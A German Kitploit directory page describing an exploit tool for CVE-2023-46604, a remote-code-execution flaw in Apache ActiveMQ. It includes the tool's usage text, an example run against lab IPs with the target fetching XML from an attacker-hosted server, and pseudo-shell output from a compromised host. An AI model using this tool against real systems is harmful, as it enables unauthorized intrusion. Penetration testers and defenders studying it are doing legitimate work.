Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-46604-ActiveMQ-RCE-pseudoshell — Dieses Skript nutzt CVE-2023046604 (Apache ActiveMQ) aus, um eine Pseudo-Shell zu erzeugen. Die Schwachstelle ermöglicht Remotecodeausführung aufgrund unsicherer Deserialisierung innerhalb des OpenWire-Protokolls. | Kitploit
Tools/GitHubGitHub/duck-sec/cve-2023-46604-activemq-rce-pseudoshell
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingRemote-Access-Tool
GitHubduck-sec/cve-2023-46604-activemq-rce-pseudoshell

CVE-2023-46604-ActiveMQ-RCE-pseudoshell

Dieses Skript nutzt CVE-2023046604 (Apache ActiveMQ) aus, um eine Pseudo-Shell zu erzeugen. Die Schwachstelle ermöglicht Remotecodeausführung aufgrund unsicherer Deserialisierung innerhalb des OpenWire-Protokolls.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
196vor 2 JahrenNoch nicht geprüft

CVE-2023-46604 RCE Pseudoshell

Dieses Skript nutzt CVE-2023046604 (Apache ActiveMQ) aus, um eine Pseudo-Shell zu generieren. Die Sicherheitslücke ermöglicht die Remote-Code-Ausführung aufgrund einer unsicheren Deserialisierung im OpenWire-Protokoll.

Beschreibung

CVE-2023-46604 ist eine Deserialisierungsschwachstelle im OpenWire-Protokoll von Apache ActiveMQ. Diese Schwachstelle kann von einem Angreifer ausgenutzt werden, um beliebigen Code auf dem Server auszuführen, auf dem ActiveMQ läuft. Ein Angreifer kann eine bösartige XML-Datei erstellen, deren Befehle vom entfernten Server ausgeführt werden.

Dieser Exploit automatisiert und abstrahiert den Prozess der XML-Dokumenterstellung, stellt einen einfachen Server zur Bereitstellung der Datei bereit und empfängt über POST Informationen vom Zielserver zurück. Dies ermöglicht eine fortlaufende Ausnutzung, ohne dass eine Reverse-Shell aufgerufen oder eine Binärdatei bereitgestellt werden muss.

Voraussetzungen

Stellen Sie vor dem Ausführen des Exploit-Skripts sicher, dass Folgendes vorhanden ist:

  • Python 3.x auf Ihrem System installiert.
  • Netzwerkzugriff auf den verwundbaren ActiveMQ-Server.
  • Genehmigung zum Testen gegen den verwundbaren Server.

Verwendung

Das Skript erfordert:

  • ActiveMQ Server-IP oder Hostname
  • Serve-IP (Eine IP auf Ihrem System, die vom Ziel erreichbar ist.)

Optional:

  • ActiveMQ Server-Port - Standard: 61616
  • Serve-Port (Der Port, auf dem der lokale Server gestartet wird) - Standard: 8080
root@kitploit:~
usage: exploit.py [-h] -i IP [-p PORT] -si SRVIP [-sp SRVPORT]

optional arguments:
  -h, --help            show this help message and exit
  -i IP, --ip IP        ActiveMQ Server IP or Hostname
  -p PORT, --port PORT  ActiveMQ Server Port, defaults to 61616
  -si SRVIP, --srvip SRVIP
                        Serve IP
  -sp SRVPORT, --srvport SRVPORT
                        Serve port, defaults to 8080

Beispiel

root@kitploit:~
$python3 exploit.py -i 10.129.230.87 -p 61616  -si 10.10.14.59 -sp 8080
#################################################################################
#  CVE-2023-46604 - Apache ActiveMQ - Remote Code Execution - Pseudo Shell      #
#  Exploit by Ducksec, Original POC by X1r0z, Python POC by evkl1d              #
#################################################################################

[*] Target: 10.129.230.87:61616
[*] Serving XML at: http://10.10.14.59:8080/poc.xml
[!] This is a semi-interactive pseudo-shell, you cannot cd, but you can ls-lah / for example.
[*] Type 'exit' to quit

#################################################################################
# Not yet connected, send a command to test connection to host.                 #
# Prompt will change to Apache ActiveMQ$ once at least one response is received #
# Please note this is a one-off connection check, re-run the script if you      #
# want to re-check the connection.                                              #
#################################################################################

[Target not responding!]$ whoami
activemq

Apache ActiveMQ$ ls -lah
total 164K
drwxr-xr-x  5 activemq activemq 4.0K Nov  7 12:50 .
drwxr-xr-x 11 activemq activemq 4.0K Nov  6 01:18 ..
-rwxr-xr-x  1 activemq activemq  21K Apr 20  2021 activemq
-rwxr-xr-x  1 activemq activemq 6.1K Apr 20  2021 activemq-diag
-rw-r--r--  1 activemq activemq  17K Apr 20  2021 activemq.jar
-rw-r--r--  1 activemq activemq 5.5K Apr 20  2021 env
drwxr-xr-x  2 activemq activemq 4.0K Nov  5 00:13 linux-x86-32
drwxr-xr-x  2 activemq activemq 4.0K Nov  5 00:13 linux-x86-64
drwxr-xr-x  2 activemq activemq 4.0K Nov  5 00:13 macosx
-rw-r--r--  1 activemq activemq  82K Apr 20  2021 wrapper.jar

Apache ActiveMQ$ 

CVE-2023-46604-RCE.webm

Credits

Dieser Exploit baut auf dem ursprünglichen POC in Go von X1r0z und dem Python POC von evkl1d auf.

Haftungsausschluss

Dieser Code wird ausschließlich zu Bildungs- und ethischen Sicherheitstestzwecken bereitgestellt. Er sollte verantwortungsvoll und nur in Umgebungen verwendet werden, in denen eine ausdrückliche Genehmigung erteilt wurde. Unbefugte oder böswillige Nutzung ist strengstens untersagt. Durch die Verwendung dieses Codes erklären Sie sich damit einverstanden, alle geltenden Gesetze, Vorschriften und ethischen Standards in Ihrem Rechtsraum einzuhalten. Die Ersteller und Mitwirkenden lehnen jede Haftung für Schäden oder Folgen ab, die aus der missbräuchlichen oder unbefugten Nutzung dieses Codes entstehen.

Tool herunterladen